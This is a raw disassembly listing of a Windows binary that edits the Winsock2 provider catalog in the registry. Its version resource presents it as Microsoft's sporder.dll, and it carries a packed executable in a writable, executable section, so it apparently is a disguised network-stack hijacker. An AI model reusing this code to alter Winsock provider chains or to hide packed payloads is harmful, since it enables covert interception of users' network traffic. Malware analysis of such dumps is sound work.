push esi
push edi
mov edi, [esp+0Ch+arg_4]
lea esi, [edi+10h]
push esi
call dword ptr ds:47A71028h
mov ebx, [esp+0Ch+arg_0]
inc eax
push eax
push esi
mov esi, ds:47A7100Ch
push 1
push 0
push 47A720B8h
push ebx
call esi
test eax, eax
jnz loc_404CC2
push 4
lea eax, [edi+114h]
push eax
push 4
push 0
push 47A720C8h
push ebx
call esi
test eax, eax
jnz short loc_404CC2
push ebp
lea ebp, [edi+118h]
push ebp
call dword ptr ds:47A71028h
inc eax
push eax
push ebp
push 1
push 0
push 47A720D0h
push ebx
call esi
test eax, eax
jnz short loc_404CC1
push 10h
push edi
push 3
push eax
push 47A720DCh
push ebx
call esi
test eax, eax
jnz short loc_404CC1
push 4
pop ebp
push ebp
lea eax, [edi+21Ch]
push eax
push ebp
push 0
push 47A720E8h
push ebx
call esi
test eax, eax
jnz short loc_404CC1
push ebp
lea eax, [edi+220h]
push eax
push ebp
push 0
push 47A72100h
push ebx
call esi
test eax, eax
jnz short loc_404CC1
push ebp
add edi, 224h
push edi
push ebp
push eax
push 47A72114h
push ebx
call esi
loc_404CC1: ; CODE XREF: sub_404C00+6A�j
; sub_404C00+7C�j ...
pop ebp
loc_404CC2: ; CODE XREF: sub_404C00+2C�j
; sub_404C00+49�j
pop edi
pop esi
pop ebx
retn 8
sub_404C00 endp
; ---------------------------------------------------------------------------
push ebp
mov eax, 2384h
lea ebp, [esp-498h]
call sub_405258
mov eax, ds:47A72134h
push edi
push 47A710BCh
mov [ebp+494h], eax
call dword ptr ds:47A71024h
xor edi, edi
cmp eax, edi
jz short loc_404D1A
push 47A710C8h
push eax
call dword ptr ds:47A71020h
cmp eax, edi
jz short loc_404D1A
push dword ptr [ebp+4A4h]
push dword ptr [ebp+4A0h]
call eax ; _acmdln
jmp loc_405114
; ---------------------------------------------------------------------------
loc_404D1A: ; CODE XREF: _0:00404CF5�j _0:00404D05�j
cmp dword ptr [ebp+4A4h], 3E8h
mov [ebp+80h], edi
jbe short loc_404D34
push 8
pop eax
jmp loc_405114
; ---------------------------------------------------------------------------
loc_404D34: ; CODE XREF: _0:00404D2A�j
push 47A72128h
push edi
push edi
call dword ptr ds:47A7101Ch
cmp eax, edi
mov [ebp+70h], eax
jnz short loc_404D52
mov eax, 277Bh
jmp loc_405114
; ---------------------------------------------------------------------------
loc_404D52: ; CODE XREF: _0:00404D46�j
push edi
push dword ptr [ebp+70h]
call dword ptr ds:47A71018h
cmp eax, 102h
jnz short loc_404D72
mov dword ptr [ebp+80h], 0AAh
jmp loc_405105
; ---------------------------------------------------------------------------
loc_404D72: ; CODE XREF: _0:00404D61�j
push esi
lea eax, [ebp+7Ch]
push eax
push 1
push edi
mov esi, 47A72010h
push esi
push 80000002h
call dword ptr ds:47A71010h
cmp eax, edi
jz short loc_404D9A
mov [ebp+80h], eax
jmp loc_4050FB
; ---------------------------------------------------------------------------
loc_404D9A: ; CODE XREF: _0:00404D8D�j
push ebx
lea eax, [ebp+64h]
push eax
lea eax, [ebp+84h]
push eax
lea eax, [ebp+5Ch]
push eax
push edi
push 47A7208Ch
push dword ptr [ebp+7Ch]
mov dword ptr [ebp+64h], 104h
call dword ptr ds:47A71000h
push dword ptr [ebp+7Ch]
mov ebx, eax
call dword ptr ds:47A71004h
cmp ebx, edi
jz short loc_404DDA
mov [ebp+80h], ebx
jmp loc_4050FA
; ---------------------------------------------------------------------------
loc_404DDA: ; CODE XREF: _0:00404DCD�j
lea eax, [ebp+84h]
push eax
push 47A7205Ch
call dword ptr ds:47A71030h
test eax, eax
jz short loc_404DFF
loc_404DF0: ; CODE XREF: _0:00404F5E�j _0:00404F75�j ...
mov dword ptr [ebp+80h], 2726h
jmp loc_4050FA
; ---------------------------------------------------------------------------
loc_404DFF: ; CODE XREF: _0:00404DEE�j
mov ebx, ds:47A7104Ch
push esi
lea eax, [ebp+390h]
push eax
call ebx
mov esi, ds:47A71050h
mov edi, 47A710A0h
push edi
lea eax, [ebp+390h]
push eax
call esi
push 47A7205Ch
lea eax, [ebp+390h]
push eax
call esi
push edi
lea eax, [ebp+390h]
push eax
call esi
push 47A720A8h
lea eax, [ebp+390h]
push eax
call esi
lea eax, [ebp+7Ch]
push eax
push 9
push 0
lea eax, [ebp+390h]
push eax
push 80000002h
call dword ptr ds:47A71010h
test eax, eax
jnz loc_4050F4
and [ebp+78h], eax
mov dword ptr [ebp+6Ch], 47B4AE00h
mov dword ptr [ebp+74h], 47BD1A40h
loc_404E7D: ; CODE XREF: _0:00404F58�j
lea eax, [ebp+54h]
push eax
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+60h]
push eax
lea eax, [ebp+188h]
push eax
push dword ptr [ebp+78h]
mov dword ptr [ebp+60h], 104h
push dword ptr [ebp+7Ch]
mov byte ptr [ebp+188h], 0
call dword ptr ds:47A71008h
cmp eax, 103h
jz loc_404F63
test eax, eax
jnz loc_4050F4
lea eax, [ebp+390h]
push eax
lea eax, [ebp+28Ch]
push eax
call ebx
push edi
lea eax, [ebp+28Ch]
push eax
call esi
lea eax, [ebp+188h]
push eax
lea eax, [ebp+28Ch]
push eax
call esi
lea eax, [ebp+28Ch]
push eax
push dword ptr [ebp+74h]
call ebx
lea eax, [ebp+68h]
push eax
push 9
push 0
lea eax, [ebp+28Ch]
push eax
push 80000002h
call dword ptr ds:47A71010h
test eax, eax
jnz loc_4050F4
push dword ptr [ebp+6Ch]
mov dword ptr [ebp+64h], 378h
push dword ptr [ebp+68h]
mov dword ptr [ebp+5Ch], 3
call sub_404AED
test eax, eax
jnz loc_4050F4
push dword ptr [ebp+68h]
call dword ptr ds:47A71004h
add dword ptr [ebp+74h], 104h
inc dword ptr [ebp+78h]
add dword ptr [ebp+6Ch], 228h
cmp dword ptr [ebp+74h], 47C111E0h
jl loc_404E7D
jmp loc_404DF0
; ---------------------------------------------------------------------------
loc_404F63: ; CODE XREF: _0:00404EB0�j
push dword ptr [ebp+7Ch]
call dword ptr ds:47A71004h
mov esi, [ebp+4A4h]
cmp [ebp+78h], esi
jnz loc_404DF0
mov edx, esi
shl edx, 2
mov ecx, edx
mov ebx, ecx
shr ecx, 2
xor eax, eax
lea edi, [ebp-0F4Ch]
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
mov ecx, edx
shr ecx, 2
xor eax, eax
lea edi, [ebp-1EECh]
rep stosd
mov ecx, edx
and ecx, 3
xor ebx, ebx
test esi, esi
rep stosb
jbe loc_40507A
mov eax, [ebp+4A0h]
add eax, 6
mov [ebp+4A0h], eax
xor eax, eax
loc_404FC9: ; CODE XREF: _0:00405074�j
mov ecx, [ebp+4A0h]
xor edi, edi
loc_404FD1: ; CODE XREF: _0:00405066�j
mov edx, [eax+47B4AE00h]
cmp edx, [ecx-6]
jnz loc_405060
mov dx, [eax+47B4AE04h]
cmp dx, [ecx-2]
jnz short loc_405060
mov dx, [eax+47B4AE06h]
cmp dx, [ecx]
jnz short loc_405060
mov dl, [eax+47B4AE08h]
cmp dl, [ecx+2]
jnz short loc_405060
mov dl, [eax+47B4AE09h]
cmp dl, [ecx+3]
jnz short loc_405060
mov dl, [eax+47B4AE0Ah]
cmp dl, [ecx+4]
jnz short loc_405060
mov dl, [eax+47B4AE0Bh]
cmp dl, [ecx+5]
jnz short loc_405060
mov dl, [eax+47B4AE0Ch]
cmp dl, [ecx+6]
jnz short loc_405060
mov dl, [eax+47B4AE0Dh]
cmp dl, [ecx+7]
jnz short loc_405060
mov dl, [eax+47B4AE0Eh]
cmp dl, [ecx+8]
jnz short loc_405060
mov dl, [eax+47B4AE0Fh]
cmp dl, [ecx+9]
jnz short loc_405060
or dword ptr [ebp+edi*4-0F4Ch], 0FFFFFFFFh
mov [ebp+edi*4-1EECh], ebx
loc_405060: ; CODE XREF: _0:00404FDA�j _0:00404FEB�j ...
inc edi
add ecx, 10h
cmp edi, esi
jb loc_404FD1
inc ebx
add eax, 228h
cmp ebx, esi
jb loc_404FC9
loc_40507A: ; CODE XREF: _0:00404FB2�j
xor eax, eax
test esi, esi
jbe short loc_405093
loc_405080: ; CODE XREF: _0:00405091�j
cmp dword ptr [ebp+eax*4-0F4Ch], 0FFFFFFFFh
jnz loc_404DF0
inc eax
cmp eax, esi
jb short loc_405080
loc_405093: ; CODE XREF: _0:0040507E�j
xor edi, edi
test esi, esi
jbe short loc_4050FA
mov ebx, 47BD1A40h
loc_40509E: ; CODE XREF: _0:004050F0�j
mov esi, [ebp+edi*4-1EECh]
cmp esi, edi
jz short loc_4050E3
lea eax, [ebp+7Ch]
push eax
push 2
push 0
push ebx
push 80000002h
call dword ptr ds:47A71010h
test eax, eax
jnz short loc_4050F4
imul esi, 228h
add esi, 47B4AE00h
push esi
push dword ptr [ebp+7Ch]
call sub_404C00
test eax, eax
jnz short loc_4050F4
push dword ptr [ebp+7Ch]
call dword ptr ds:47A71004h
loc_4050E3: ; CODE XREF: _0:004050A7�j
inc edi
add ebx, 104h
cmp edi, [ebp+4A4h]
jb short loc_40509E
jmp short loc_4050FA
; ---------------------------------------------------------------------------
loc_4050F4: ; CODE XREF: _0:00404E66�j _0:00404EB8�j ...
mov [ebp+80h], eax
loc_4050FA: ; CODE XREF: _0:00404DD5�j _0:00404DFA�j ...
pop ebx
loc_4050FB: ; CODE XREF: _0:00404D95�j
push dword ptr [ebp+70h]
call dword ptr ds:47A71054h
pop esi
loc_405105: ; CODE XREF: _0:00404D6D�j
push dword ptr [ebp+70h]
call dword ptr ds:47A71058h
mov eax, [ebp+80h]
loc_405114: ; CODE XREF: _0:00404D15�j _0:00404D2F�j ...
mov ecx, [ebp+494h]
pop edi
call sub_4051B0
add ebp, 498h
leave
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:47A72134h
test eax, eax
jz short loc_405140
cmp eax, 0BB40E64Eh
jnz short locret_4051AE
loc_405140: ; CODE XREF: _0:00405137�j
push esi
lea eax, [ebp-8]
push eax
call dword ptr ds:47A7103Ch
mov esi, [ebp-4]
xor esi, [ebp-8]
call dword ptr ds:47A71038h
xor esi, eax
call dword ptr ds:47A71034h
xor esi, eax
call dword ptr ds:47A7105Ch
xor esi, eax
lea eax, [ebp-10h]
push eax
call dword ptr ds:47A7102Ch
mov eax, [ebp-0Ch]
xor eax, [ebp-10h]
xor esi, eax
mov ds:47A72134h, esi
jnz short loc_40518D
mov dword ptr ds:47A72134h, 0BB40E64Eh
loc_40518D: ; CODE XREF: _0:00405181�j
push 47A710FCh
call dword ptr ds:47A71024h
test eax, eax
pop esi
jz short locret_4051AE
push 47A710E0h
push eax
call dword ptr ds:47A71020h
mov ds:47C12184h, eax
locret_4051AE: ; CODE XREF: _0:0040513E�j _0:0040519B�j
leave
retn
; =============== S U B R O U T I N E =======================================
sub_4051B0 proc near ; CODE XREF: _0:00404ADE�p _0:0040511B�p ...
var_2AC = byte ptr -2ACh
cmp ecx, ds:47A72134h
jnz short loc_4051B9
retn
; ---------------------------------------------------------------------------
loc_4051B9: ; CODE XREF: sub_4051B0+6�j
jmp $+5
push ebp
lea ebp, [esp+4+var_2AC]
sub esp, 328h
mov eax, ds:47A72134h
mov [ebp+2A4h], eax
mov eax, ds:47C12180h
test eax, eax
jz short loc_4051E2
call eax ; _acmdln
loc_4051E2: ; CODE XREF: sub_4051B0+2E�j
cmp dword ptr ds:47C12184h, 0
jz short loc_405229
push edi
xor eax, eax
and [ebp-28h], eax
push 13h
pop ecx
lea edi, [ebp-7Ch]
rep stosd
mov ecx, 0B2h
lea edi, [ebp-24h]
rep stosd
lea eax, [ebp-80h]
mov [ebp-30h], eax
lea eax, [ebp-28h]
push 0
mov dword ptr [ebp-80h], 0C0000409h
mov [ebp-2Ch], eax
call dword ptr ds:47A71048h
lea eax, [ebp-30h]
push eax
call dword ptr ds:47C12184h
pop edi
loc_405229: ; CODE XREF: sub_4051B0+39�j
push 502h
call dword ptr ds:47A71044h
push eax
call dword ptr ds:47A71040h
mov ecx, [ebp+2A4h]
call sub_4051B0
add ebp, 2A8h
leave
retn
sub_4051B0 endp
; ---------------------------------------------------------------------------
db 0Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_405258 proc near ; CODE XREF: _0:004046DB�p _0:00404CD5�p
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_40526D
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_40526D: ; CODE XREF: sub_405258+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_405272: ; CODE XREF: sub_405258+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_405272
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_405258 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 1D54h, 2 dup(0)
dd 1EF0h, 1018h, 1D3Ch, 2 dup(0)
dd 1F52h, 1000h, 5 dup(0)
dd 1F2Eh, 1F20h, 1F10h, 1EFEh, 1F42h, 0
dd 1DE2h, 1DF8h, 1E08h, 1E1Ah, 1E2Eh, 1E3Ah, 1DD6h, 1E64h
dd 1E7Ah, 1E90h, 1EAAh, 1EBEh, 1ED2h, 1DCAh, 1DBEh, 1DAEh
dd 1DA0h, 1E54h, 0
dd 6C43002Eh, 4865736Fh, 6C646E61h, 2B80065h, 656C6552h
dd 4D657361h, 78657475h, 3B00000h, 7274736Ch, 41746163h
dd 3B90000h, 7274736Ch, 41797063h, 3B30000h, 7274736Ch
dd 41706D63h, 3850000h, 74696157h, 53726F46h, 6C676E69h
dd 6A624F65h, 746365h, 7243005Ah, 65746165h, 6574754Dh
dd 4178h, 65470198h, 6F725074h, 64644163h, 73736572h, 1770000h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 3BF0000h
dd 7274736Ch, 416E656Ch, 2990000h, 72657551h, 72655079h
dd 6D726F66h, 65636E61h, 6E756F43h, 726574h, 654701D5h
dd 63695474h, 756F436Bh, 746Eh, 6547013Eh, 72754374h, 746E6572h
dd 65726854h, 64496461h, 13B0000h, 43746547h, 65727275h
dd 7250746Eh, 7365636Fh, 644973h, 654701C0h, 73795374h
dd 546D6574h, 41656D69h, 6C694673h, 6D695465h, 3510065h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 13A0000h
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 33D0073h
dd 55746553h, 6E61686Eh, 64656C64h, 65637845h, 6F697470h
dd 6C69466Eh, 726574h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 1F90000h, 53676552h, 61567465h, 4565756Ch, 4178h, 655201D6h
dd 756E4567h, 79654B6Dh, 417845h, 655201C9h, 6F6C4367h
dd 654B6573h, 1EC0079h, 51676552h, 79726575h, 756C6156h
dd 41784565h, 1E20000h, 4F676552h, 4B6E6570h, 78457965h
dd 44410041h, 49504156h, 642E3233h, 6C6Ch, 52455355h, 642E3233h
dd 6C6Ch, 2 dup(0)
dd 3E7FF277h, 0
dd 1FACh, 1, 2 dup(2), 1F98h, 1FA0h, 1FA8h, 1730h, 1136h
dd 1FB8h, 1FCFh, 10000h, 524F5053h, 2E524544h, 6C6C64h
dd 57435357h, 65746972h, 656D614Eh, 63617053h, 64724F65h
dd 57007265h, 72574353h, 50657469h, 69766F72h, 4F726564h
dd 72656472h, 7 dup(0)
dd 47A71B92h, 3 dup(0)
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\WinSock2\Parameters',0
align 10h
aProtocol_catal db 'Protocol_Catalog9',0
align 4
aNamespace_cata db 'NameSpace_Catalog5',0
align 4
aCurrent_protoc db 'Current_Protocol_Catalog',0
align 4
aCurrent_namesp db 'Current_NameSpace_Catalog',0
align 10h
aCatalog_entrie db 'Catalog_Entries',0
aDisplaystring db 'DisplayString',0
align 10h
aEnabled db 'Enabled',0
aLibrarypath db 'LibraryPath',0
aProviderid db 'ProviderId',0
align 10h
aStoresservicec db 'StoresServiceClassInfo',0
align 4
aSupportednames db 'SupportedNameSpace',0
align 4
aVersion db 'Version',0
aSporder_dll_0 db 'sporder.dll',0
aSporder_dll_1 db 'sporder.dll',0
aNc@ db 'Næ@»',0
align 4
dd 34h dup(0)
dd 10000h, 10h, 80000018h, 3 dup(0)
dd 10000h, 1, 80000030h, 3 dup(0)
dd 10000h, 409h, 48h, 1A3060h, 3A0h, 4 dup(0)
dd 3403A0h, 560000h, 5F0053h, 450056h, 530052h, 4F0049h
dd 5F004Eh, 4E0049h, 4F0046h, 0
dd 0FEEF04BDh, 10000h, 50002h, 0ECE0000h, 50002h, 0ECE0000h
dd 3Fh, 0
dd 40004h, 2, 3 dup(0)
dd 2FEh, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
dd 66006Eh, 6Fh, 2DAh, 300001h, 300034h, 300039h, 420034h
dd 30h, 16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
dd 65006Dh, 0
aMicrosoftCorpo:
unicode 0, <Microsoft Corporation>,0
aN:
unicode 0, <n#>
dd 460001h, 6C0069h, 440065h, 730065h, 720063h, 700069h
dd 690074h, 6E006Fh, 0
aWinsock2Reorde:
unicode 0, <WinSock2 reorder service providers>,0
align 4
aF:
unicode 0, <f#>
dd 460001h, 6C0069h, 560065h, 720065h, 690073h, 6E006Fh
dd 0
a5_2_3790_0Srv0:
unicode 0, <5.2.3790.0 (srv03_rtm.030324-2048)>,0
align 4
a8 db '8',0
dw 0Ch
dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch, 6D0061h
dd 65h, 700073h, 72006Fh, 650064h, 2E0072h, 6C0064h, 6Ch
dd 2E0080h, 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h
dd 690072h, 680067h, 74h, 2000A9h, 69004Dh, 720063h, 73006Fh
dd 66006Fh, 200074h, 6F0043h, 700072h, 72006Fh, 740061h
dd 6F0069h, 2E006Eh, 410020h, 6C006Ch, 720020h, 670069h
dd 740068h, 200073h, 650072h, 650073h, 760072h, 640065h
dd 2Eh, 0C0040h, 4F0001h, 690072h, 690067h, 61006Eh, 46006Ch
dd 6C0069h, 6E0065h, 6D0061h, 65h, 700073h, 72006Fh, 650064h
dd 2E0072h, 6C0064h, 6Ch, 25006Ah, 500001h, 6F0072h, 750064h
dd 740063h, 61004Eh, 65006Dh, 0
aMicrosoftoWind:
unicode 0, <Microsoft® Windows® Operating System>,0
align 4
unicode 0, <:>
dw 0Bh
dd 500001h, 6F0072h, 750064h, 740063h, 650056h, 730072h
dd 6F0069h, 6Eh, 2E0035h, 2E0032h, 370033h, 300039h, 30002Eh
dd 0
dd 44h, 560001h, 720061h, 690046h, 65006Ch, 6E0049h, 6F0066h
dd 0
dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
dd 6E006Fh, 0
dd 4B00409h, 1000h, 104h, 314F3149h, 3166315Bh, 31A3316Dh
dd 31C631ABh, 31F531E9h, 322A321Ah, 32503235h, 326F3256h
dd 3284327Fh, 32AB3293h, 32E032CEh, 331532E7h, 33923378h
dd 33B833A9h, 33DF33C7h, 345333F3h, 34D434B0h, 34EB34DFh
dd 34FD34F4h, 352B350Ah, 355C3535h, 35A13573h, 35EB35C7h
dd 36333611h, 36753655h, 368B3682h, 36BD36A8h, 36DB36C9h
dd 370C36F5h, 37433722h, 37553749h, 37673760h, 37A5379Dh
dd 37E337C0h, 381437EFh, 382F3824h, 3850384Ah, 38793869h
dd 388D387Eh, 38C838A5h, 38E138DAh, 3972390Fh, 39BC39A4h
dd 3A3B39D0h, 3A583A4Bh, 3A6E3A63h, 3A843A79h, 3A9A3A8Fh
dd 3AB03AA5h, 3B213B02h, 3B473B31h, 3B723B68h, 3BAF3B99h
dd 3BC33BBBh, 3BD73BCBh, 3BED3BE5h, 3BFC3BF6h, 3C0D3C06h
dd 3C1A3C12h, 3C403C35h, 3C823C4Ch, 3C983C8Ch, 3C9Fh, 2000h
dd 0Ch, 3000h, 0D6h dup(0)
_0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_1 segment para public 'CODE' use32
assume cs:_1
;org 406000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_406000 dd 0E6h dup(0) ; DATA XREF: _1:0040E131�o
dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0
dd 40h, 8 dup(0)
dd 100h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 0F5828325h, 3 dup(0A6ECE261h), 0A6E0FE1Ah, 0A6ECE260h
dd 0A6E2FEE2h, 0A6ECE262h, 0A6E7FD0Eh, 0A6ECE260h, 0A6E6FD0Eh
dd 0A6ECE265h, 0A6E8FD0Eh, 0A6ECE263h, 0A6E8C457h, 0A6ECE263h
dd 0A6EDE261h, 0A6ECE2C0h, 0A6FFFD03h, 0A6ECE26Eh, 0A6E7C457h
dd 0A6ECE277h, 0A6E8C29Eh, 0A6ECE260h, 68636952h, 0A6ECE261h
dd 6 dup(0)
dd 4550h, 3014Ch, 45D07DCBh, 2 dup(0)
dd 210E00E0h, 6010Bh, 0B000h, 0E00h, 0
dd 0D2A4h, 1000h, 0C000h, 10000000h, 1000h, 200h, 4, 0
dd 4, 0
dd 0F000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 0D014h, 3Dh, 0D0B4h, 244h, 6 dup(0)
dd 0E000h, 10h, 14h dup(0)
dd 7865742Eh, 74h, 0C000h, 1000h, 4A00h, 400h, 32434550h
dd 75284753h, 0
dd 0E0000020h, 7273722Eh, 63h, 1000h, 0D000h, 1000h, 4E00h
dd 0
dd 3F290753h, 0
dd 0E0000020h, 6C65722Eh, 636Fh, 200h, 0E000h, 200h, 5E00h
dd 0
dd 2F291733h, 0
dd 0C0000040h, 64h dup(0)
dd 0DCD8h, 0B98Dh, 4927h, 40002h, 0FFFD6F00h, 1B4380FFh
dd 0C43430F7h, 0B140FE96h, 0ED119A68h, 1F1C523Eh, 80FD2FD7h
dd 98830ECFh, 667D4F9Dh, 0D79763F9h, 2769AF28h, 579A092Ch
dd 1180C014h, 33D80F3Ch, 0E177CC15h, 4C841779h, 26A79964h
dd 47C2F40Fh, 95BCF3B6h, 1FDDA5CEh, 0C1DEA155h, 1F06A524h
dd 5743B98Ah, 0DF1B82C2h, 0C1997BFEh, 28892D50h, 4BA0187Fh
dd 0B8C8F617h, 0B06576Fh, 34DF1C51h, 54B38EEh, 0FA84EDA3h
dd 0E1BF8474h, 8785DAF3h, 13DEF266h, 47AD65BFh, 4BE97F2Eh
dd 0D8799FD9h, 0ED05ADB0h, 0D7E5AD43h, 4FEBD905h, 87683E7Ch
dd 0F4FF6E2Ah, 55165AF0h, 0CA5D126Dh, 0BBA62665h, 0B6C7EC76h
dd 4389239h, 1B0C9C28h, 0DB4272ADh, 0E15242ADh, 5036BEE5h
dd 43F152DAh, 2D6B89B7h, 703A2A28h, 5FB83218h, 49D6C685h
dd 9B1B572Eh, 276D993Ah, 5B17208Eh, 230BD147h, 9D8D87CDh
dd 35920D04h, 0DEA62003h, 992C22F1h, 4AAF9759h, 77C63D50h
dd 819C50CBh, 7CACDBCh, 0D4756296h, 38014976h, 0F79855h
dd 0FF1CAA83h, 5208D76Dh, 0F14B5264h, 89A66756h, 2C24953Bh
dd 751677D5h, 3BD83694h, 276E167Fh, 6137B1B1h, 5D1462BBh
dd 0D8CA1304h, 0F5F6A4FCh, 90793CC0h, 0B2F1A841h, 0E1BCF9D1h
dd 0D717C064h, 561ADF08h, 61A71B6Ch, 195570E8h, 3C127A51h
dd 0D3E1DC31h, 59A5FA29h, 0A6006D61h, 307206DFh, 3F445CA4h
dd 0F3CD9680h, 33446753h, 97959860h, 4BF71618h, 0C5C782DEh
dd 8ED50972h, 0AD480D2Bh, 0A02D9E0h, 0B08DB2A6h, 0D7781466h
dd 473E05E4h, 2B54E1h, 0AC4C595Eh, 3D90F731h, 57BB9480h
dd 2D978BCFh, 5E2ECDC0h, 5DCE7B19h, 0E7932D03h, 0F2920AB4h
dd 51D0AB93h, 57201D14h, 9D0DD631h, 0F1558F1Ch, 0B601B0EEh
dd 1AF59DE6h, 5969B4A0h, 66781184h, 896BEFF3h, 52AECD45h
dd 73D6010Dh, 8094EF3h, 70FF1415h, 0AB5EB95Dh, 3954E0C8h
dd 788B8FE3h, 5F96E66Ch, 33ED5E24h, 491902B8h, 0ED4F4FB1h
dd 736481E5h, 0FC9D25F5h, 4A7F4166h, 4982814Ah, 309AC8DFh
dd 594C7C44h, 0FE7163A1h, 31F1E919h, 0B932CCE8h, 81002D74h
dd 0D89D7933h, 12B9DFB3h, 4C651274h, 40184005h, 321E31CCh
dd 94FACD0h, 0FA5E450Ah, 6FC89604h, 47E1C02Fh, 0B2BFBA89h
dd 35D991DFh, 10242979h, 62B9128Ch, 0D2F44EC0h, 8E86ED0Ch
dd 8D3D65B2h, 0DE8F4E7Eh, 3499EEDDh, 0C52BC7B6h, 8C4A0B9Eh
dd 7C8DB232h, 761D336Ah, 1B322DC4h, 0C894B38Ch, 0C1F0F280h
dd 6385DE0Fh, 7B46F99Fh, 10C57C9Ch, 0A48A3395h, 77C233C6h
dd 379BA993h, 0C2D6CA1Fh, 0D020BAF2h, 1B345466h, 801916CCh
dd 0CE7934F9h, 7C1D9B7Dh, 0CA5D4E59h, 0DB494927h, 0A375264Dh
dd 55E0E403h, 0EACFDAC1h, 0C8B48E29h, 0C3785F52h, 0D151828Ch
dd 1D8363E2h, 521B33B9h, 54141B7Eh, 3F275612h, 0C4FB27C0h
dd 9F60C5CCh, 7F7D1E58h, 5F1BA735h, 87B0C0A8h, 0F84D8C9Fh
dd 4FC9E424h, 0BA4A2774h, 0AA437169h, 32393DF2h, 0FB28FF13h
dd 71E1D3FAh, 0F2D2E3B2h, 0BDB97CB6h, 0E87535EDh, 5224C10h
dd 0F86FC834h, 46076744h, 9D27C745h, 0A1996C0Fh, 8E61EE87h
dd 47BB96F6h, 0DB5CA04Fh, 0E6C6A23h, 0A8527173h, 0A2F55A21h
dd 0B074E48Eh, 0FABC6F1Ah, 21CC9943h, 4BA123FFh, 0B22D5D2h
dd 8D76BC00h, 0EA6D7035h, 4F2AC4D4h, 53D78DD9h, 670D2691h
dd 9F1BE9AFh, 1F48DE13h, 61218D4Eh, 0A911D3DAh, 145EB0B6h
dd 17F0724h, 3C55D0B2h, 31AA4A55h, 1DF3C41Bh, 43553ECCh
dd 9FF3DEB1h, 0A4559244h, 557E7026h, 0BCC44E4Bh, 0CD559637h
dd 0AB517D69h, 92F855Bh, 0C987220Bh, 0F05C82F2h, 0DE671B21h
dd 0EDE584E6h, 946C2BACh, 0CB30931Ah, 1E209598h, 7436BCACh
dd 9D23002Fh, 0AF845569h, 23A0C214h, 0C53EA42Ah, 5D4A3FB6h
dd 4C7BCE99h, 8997EBDFh, 1715313Bh, 5A931E0Bh, 2C8DD567h
dd 0BF9BF6B2h, 5F6128B5h, 0EA083E84h, 0A91E0FDBh, 0F1C15526h
dd 0A9764B07h, 0DCE254FFh, 163A42D1h, 25E1D6EDh, 80435EAAh
dd 4D07D59Bh, 184257CAh, 0CBEF44E1h, 633F6634h, 310D9F0h
dd 8FDD57EEh, 6B9C10EEh, 0F2AB9387h, 6D5DB267h, 0A2E4F15Eh
dd 41327E40h, 7C6E4E0Fh, 95CC6E3Ah, 0EB6A0245h, 990BB244h
dd 8A8964A3h, 0AD060A4Fh, 940CE3A6h, 75EC1F94h, 0BDB48625h
dd 25BEB12Bh, 8B336D67h, 31F0F72Fh, 0C85669C7h, 57028A28h
dd 55306283h, 59DE502h, 0BA0CD6A0h, 80D14FB6h, 4F7739C3h
dd 46FB27C9h, 0C11035C4h, 3FFCDFDDh, 43498AF6h, 523BDA41h
dd 312E36B5h, 24748C5Dh, 0C150881Dh, 0AA0459B3h, 0D5C2A8AAh
dd 4862523Fh, 219EB325h, 578864E5h, 0E876CE82h, 9B70D0D0h
dd 0F498CA77h, 0D01380A3h, 5A1A86ABh, 7A245739h, 0B42B1EA1h
dd 4CFC1690h, 30A17536h, 465DDA59h, 2DCAB5A2h, 8374858Bh
dd 7714220Dh, 37735CCCh, 61C7308Dh, 9871CAE3h, 49497364h
dd 0F31DE346h, 40085DD3h, 955C3D6h, 1356DE53h, 0DCAB0BA0h
dd 751D1CE2h, 6134CD5Ah, 0A65CE826h, 73D2932Eh, 2986F93Ch
dd 0ADCBB05Bh, 0D44BD208h, 1A1EDEABh, 0C4E461A6h, 429BF9B6h
dd 2ED4996Dh, 13F7E949h, 0BD62C2C8h, 0A9468E92h, 0F7E318E1h
dd 0ACA96975h, 7F16FADFh, 6E59A84Dh, 50658DFBh, 1BAFC277h
dd 0E41E39DAh, 19745DD3h, 786F8C0Ah, 0FA644362h, 1742E4E4h
dd 22601FE7h, 9B8C915h, 11EA38ABh, 264C933Fh, 0E8FDC4A7h
dd 275295E0h, 210B1BCh, 0E675BABDh, 0B4466E0Eh, 58729B01h
dd 96B5ED80h, 6CEAE357h, 0AA7F1800h, 685F81B1h, 63935120h
dd 9D750C14h, 79E079E9h, 20F815C5h, 0AF45BA77h, 0FE9E3C63h
